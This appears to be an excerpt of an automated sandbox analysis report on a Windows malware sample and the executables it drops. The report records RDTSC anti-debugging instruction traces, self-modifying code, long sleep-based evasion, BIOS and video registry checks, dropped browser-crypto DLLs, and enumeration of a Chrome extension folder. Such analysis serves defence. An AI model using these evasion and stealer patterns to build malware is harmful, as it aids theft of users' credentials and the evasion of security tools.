Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 24993B second address: 24997B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 mov ecx, dword ptr [ebp+122D29C8h] 0x0000000f call 00007F2738B89E09h 0x00000014 jno 00007F2738B89E14h 0x0000001a push eax 0x0000001b jc 00007F2738B89E0Ah 0x00000021 push eax 0x00000022 pushad 0x00000023 popad 0x00000024 pop eax 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 24997B second address: 249980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249980 second address: 249A3B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F2738B89E06h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edx 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 jmp 00007F2738B89E17h 0x0000001e je 00007F2738B89E0Ch 0x00000024 jg 00007F2738B89E06h 0x0000002a popad 0x0000002b pop eax 0x0000002c jbe 00007F2738B89E0Bh 0x00000032 mov esi, 0F8E5FECh 0x00000037 sub edx, dword ptr [ebp+122D2800h] 0x0000003d push 00000003h 0x0000003f add cx, C498h 0x00000044 push 00000000h 0x00000046 call 00007F2738B89E0Ah 0x0000004b mov ecx, 55B2C87Ch 0x00000050 pop edi 0x00000051 push 00000003h 0x00000053 push 00000000h 0x00000055 push ebx 0x00000056 call 00007F2738B89E08h 0x0000005b pop ebx 0x0000005c mov dword ptr [esp+04h], ebx 0x00000060 add dword ptr [esp+04h], 00000015h 0x00000068 inc ebx 0x00000069 push ebx 0x0000006a ret 0x0000006b pop ebx 0x0000006c ret 0x0000006d jmp 00007F2738B89E14h 0x00000072 cld 0x00000073 push 4A5E3EBFh 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F2738B89E18h 0x0000007f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A3B second address: 249A40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A40 second address: 249A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 75A1C141h 0x00000013 mov esi, 3BED1B79h 0x00000018 lea ebx, dword ptr [ebp+1244E7D7h] 0x0000001e mov dword ptr [ebp+122D1831h], eax 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A74 second address: 249A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A7A second address: 249A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249A7E second address: 249A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249AEB second address: 249B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F2738B89E0Fh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F2738B89E0Ch 0x0000001b pop esi 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 jns 00007F2738B89E06h 0x00000027 jmp 00007F2738B89E0Ah 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249B32 second address: 249B47 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249B47 second address: 249B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249B4D second address: 249C04 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2738E98EE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F2738E98EE8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 call 00007F2738E98EEAh 0x0000002c mov dword ptr [ebp+122D194Bh], edx 0x00000032 pop edx 0x00000033 push 00000003h 0x00000035 mov di, CACCh 0x00000039 or di, 5384h 0x0000003e push 00000000h 0x00000040 sub ecx, dword ptr [ebp+122D189Dh] 0x00000046 push 00000003h 0x00000048 mov edi, 0DB0C5EBh 0x0000004d push 9DCD71B2h 0x00000052 jo 00007F2738E98F01h 0x00000058 jng 00007F2738E98EFBh 0x0000005e xor dword ptr [esp], 5DCD71B2h 0x00000065 movzx ecx, cx 0x00000068 jmp 00007F2738E98EEEh 0x0000006d lea ebx, dword ptr [ebp+1244E7E0h] 0x00000073 mov dword ptr [ebp+122D37E1h], eax 0x00000079 xchg eax, ebx 0x0000007a push esi 0x0000007b jp 00007F2738E98EE8h 0x00000081 pop esi 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 pushad 0x00000088 popad 0x00000089 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C04 second address: 249C14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C70 second address: 249C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C76 second address: 249C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b sub dword ptr [ebp+122D3802h], edx 0x00000011 push C1EE6B20h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C93 second address: 249C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C98 second address: 249C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249C9E second address: 249CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249CA2 second address: 249D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3E119560h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F2738B89E08h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov edi, 3F64FA67h 0x0000002e sbb dh, FFFFFFB6h 0x00000031 push 00000003h 0x00000033 push 00000000h 0x00000035 call 00007F2738B89E0Bh 0x0000003a pop ecx 0x0000003b push 00000003h 0x0000003d mov si, BF1Dh 0x00000041 call 00007F2738B89E09h 0x00000046 jns 00007F2738B89E0Eh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jl 00007F2738B89E08h 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249D11 second address: 249D16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249D16 second address: 249D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jmp 00007F2738B89E0Bh 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ebx 0x00000015 jo 00007F2738B89E08h 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jmp 00007F2738B89E0Fh 0x00000027 pop eax 0x00000028 stc 0x00000029 lea ebx, dword ptr [ebp+1244E7EBh] 0x0000002f cmc 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 ja 00007F2738B89E08h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90D33 second address: 4A90D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90D39 second address: 4A90D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90D3D second address: 4A90D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2738E98EEFh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 23CE75 second address: 23CE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2738B89E06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 2696AB second address: 2696C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 26981A second address: 269840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2738B89E06h 0x0000000a popad 0x0000000b jmp 00007F2738B89E0Bh 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 jng 00007F2738B89E06h 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269840 second address: 269844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269DD1 second address: 269DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269DD5 second address: 269DE2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269DE2 second address: 269E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Ah 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F2738B89E17h 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 jng 00007F2738B89E06h 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269E1A second address: 269E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269E20 second address: 269E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F2738B89E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F2738B89E06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269E36 second address: 269E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 269E3A second address: 269E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 26A2BC second address: 26A2C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Special instruction interceptor: First address: 30E9B4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Special instruction interceptor: First address: 4BA51F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 88E9B4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: A3A51F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Special instruction interceptor: First address: 2FF605 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: E9F605 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Code function: 6_2_04A906A8 rdtsc 6_2_04A906A8
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1645
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1852
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1899
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1873
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1104
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1145
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1162
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1122
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1145
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1159
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1924 Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1924 Thread sleep time: -120060s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4952 Thread sleep count: 61 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4952 Thread sleep time: -122061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5612 Thread sleep count: 1645 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5612 Thread sleep time: -3291645s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5196 Thread sleep count: 1852 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5196 Thread sleep time: -3705852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4040 Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4040 Thread sleep time: -140070s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6944 Thread sleep count: 311 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6944 Thread sleep time: -9330000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7192 Thread sleep time: -1440000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3840 Thread sleep count: 1899 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3840 Thread sleep time: -3799899s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1088 Thread sleep count: 1873 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1088 Thread sleep time: -3747873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7752 Thread sleep count: 1104 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7752 Thread sleep time: -2209104s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7756 Thread sleep count: 1145 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7756 Thread sleep time: -2291145s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760 Thread sleep count: 1162 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760 Thread sleep time: -2325162s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7720 Thread sleep count: 319 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7720 Thread sleep time: -9570000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7952 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7768 Thread sleep count: 1122 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7768 Thread sleep time: -2245122s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7764 Thread sleep count: 1145 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7764 Thread sleep time: -2291145s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776 Thread sleep count: 1159 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776 Thread sleep time: -2319159s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
